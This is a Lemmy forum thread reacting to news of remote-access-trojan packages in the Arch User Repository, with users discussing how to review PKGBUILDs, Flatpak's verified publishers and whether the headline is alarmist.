Arch Linux Users at Risk Again as AUR Hit by Another RAT (news.itsfoss.com)
from KarnaSubarna@lemmy.ml to linux@lemmy.ml on 01 Aug 14:51
https://lemmy.ml/post/34006754

#linux

threaded - newest

MyNameIsRichard@lemmy.ml on 01 Aug 15:11 next collapse

The malicious packages were found and removed quite quickly. Also anyone who doesn’t blindly install from the AUR would have seen a suspicious .lol url. I suppose that a genuine package using a .lol url isn’t impossible, it’s just very unlikely,

These attacks do demonstrate the strength and weakness of the AUR, that anyone can upload anything at any time. The same as flathub and the snap store. Treat all of them with appropriate caution.

KarnaSubarna@lemmy.ml on 01 Aug 15:47 collapse

Flatpak does have a concept of Verified Publisher. Many distros ship flatpak app store with default filter set to Verified Publisher only.

danielquinn@lemmy.ca on 01 Aug 16:01 next collapse

That sounds like a nice feature we could use for the Aur actually. We already have the votes value, but some sort of verification body could help rescue the Aur’s reputation.

Cricket@lemmy.zip on 01 Aug 20:15 collapse

Many distros ship flatpak app store with default filter set to Verified Publisher only.

Also, if your distro doesn’t do this, you can do it yourself. You can modify, for instance, KDE Discover’s flathub repo to use the verified subset.

Feyd@programming.dev on 01 Aug 15:44 next collapse

I feel like these headlines are designed to be way scarier than the scenarios actually are to people that don’t know much about Arch Linux.

scintilla@beehaw.org on 01 Aug 17:45 next collapse

Seriously. It’s technically true that there was a RAT on the AUR but the way it’s titled is written to intentionally invoke times where it was more than one thing.

eldavi@lemmy.ml on 01 Aug 18:33 next collapse

true and part of me suspects that it’s intentional on the part of arch users so that they can continue to tell the world that they “use arch btw” lol

fouc@feddit.uk on 01 Aug 21:24 next collapse

I think it’s a good thing to frighten users just a little bit. Arch is no longer a niche distro and it was only a matter of time before someone took advantage of the generally unvetted AUR. It’s a wake-up call that the times of good faith are gone and you need to pay attention.

Feyd@programming.dev on 01 Aug 21:34 next collapse

Just tell them to read the arch wiki page on AUR and take it seriously, IMO

Euphoma@lemmy.ml on 02 Aug 03:08 collapse

Instead of someone accidentally ruining your pc, they intentionally ruin your pc!

gazby@lemmy.zip on 02 Aug 04:20 collapse

Just standard clickbait, but sounds more serious because we understand the extent to which they’re going out of their way to bend and withhold the facts.

h4x0r@lemmy.dbzer0.com on 01 Aug 16:01 next collapse

Installing from AUR without reviewing the PKGBUILD is a self pwn.

umbrella@lemmy.ml on 01 Aug 18:08 next collapse

isnt that well known though? AUR packages are built by third parties (eg users) and there were always warnings against just this, no?

LeFantome@programming.dev on 01 Aug 18:22 collapse

It is a well known risk but not something that was a real risk numerically. I mean, it still isn’t given the number of packages in the AUR.

This is a couple of malicious packages discovered in a short period though. Not a good sign. It was really impact the AUR if polluting it with malware became common.

You should always inspect AUR packages before installing them but few people do. Many would not even know what they were looking at.

umbrella@lemmy.ml on 01 Aug 18:25 collapse

yeah, that’s almost as bad as those apps requiring you to pipe a remote script through sudo shell

atzanteol@sh.itjust.works on 01 Aug 18:40 collapse

God I hate those. The worst way to distribute apps.

umbrella@lemmy.ml on 01 Aug 18:48 collapse

especially when flatpaks exist now!

electric_nan@lemmy.ml on 01 Aug 21:45 next collapse

Me, a hacker, targeting anyone who says they use Arch btw.

mugita_sokiovt@discuss.online on 02 Aug 00:29 next collapse

This is why I just use the Chaotic AUR, knowing that something like this was being posted everywhere. My producer, Neigsendoig, does the exact same with his machine.

We both use CachyOS anyway.

mactan@lemmy.ml on 02 Aug 04:35 next collapse

I saw two pkgbuild from the user, I don’t really know what I’m looking at in pkgbuilds generally but these were dead obvious something was bogus . downloading arbitrary files from some url like (segs)(dot)(lol) hopefully sufficiently defanged

teawrecks@sopuli.xyz on 02 Aug 05:25 collapse

Man, we’re gonna have to change the name of the AUR because bad journalists keep thinking this has something to do with the distro.

“Arch Linux Users who go out of their way to install RAT at risk of installing RAT”